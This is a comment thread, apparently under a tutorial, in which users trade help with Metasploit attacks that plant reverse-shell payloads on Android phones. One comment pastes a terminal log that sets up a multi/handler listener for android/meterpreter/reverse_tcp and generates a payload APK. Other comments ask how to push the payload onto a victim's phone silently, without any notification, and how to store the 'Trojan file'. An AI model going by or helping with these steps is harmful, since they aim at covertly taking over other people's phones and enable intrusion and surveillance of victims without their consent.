is anyone hacked nougat and Oreo ..
i tried sometimes but unfortunately not succeeded.
metasploit freezes on below line.
* Started reverse TCP handler on ..(LHOST and PORT number)
i tried both LAN and WAN(using ngrok)
i'm using kali on vmware
is there any new exploit for that?

I have done the processes ....but they works on android lollipop.......but the meterpreter sessions died when I tried on android nougat....someone help!!!!!!

sir in mu case this coding is stucked and not working. here is text i copied from terminal have a look and please help me what to do k

  • No platform was selected, choosing Msf::Module::Platform::Android from the payload
  • No arch selected, selecting arch: dalvik from the payload

No encoder or badchars specified, outputting raw payload
Payload size: 10093 bytes

root@kali:~# msfconsole

.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _______
( 3 C ) /|__ / Metasploit! \
;@'. _*_,." \|--- \_______/

= metasploit v4.17.3-dev

  • -- --= 1795 exploits - 1019 auxiliary - 310 post
  • -- --= 538 payloads - 41 encoders - 10 nops
  • -- --= Free Metasploit Pro trial: [

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

* Started reverse TCP handler on

how to sent victm android mobile meterpreter paload apk without notification install apk without touch

I was trying the tutorial, but when i try to start the listener, after i give the exploit command, the thing is stucked saying started reverse tcp handler on my private ip:4444.

Can you please help how to solve this.

You did a great tutorial. I just can't understand why you are yelling all the time in your post!!! With exclamation points behind every sentence!!!! Like you are doing nothing but screaming at people the whole time!!!! Like this!!!!


can i make a payload with variable ip?

This is a great tutorial, but I am having some problem. I am using Kali Linuxon an Unrooted Android Phone.The problem is that I cannot locate the Trojan Fileon my phone. Can you tell me the directory to store the file in my Internal Storageinstead of the Root folder?

Problem with Storing the File

Share Your Thoughts

  • Hot
  • Latest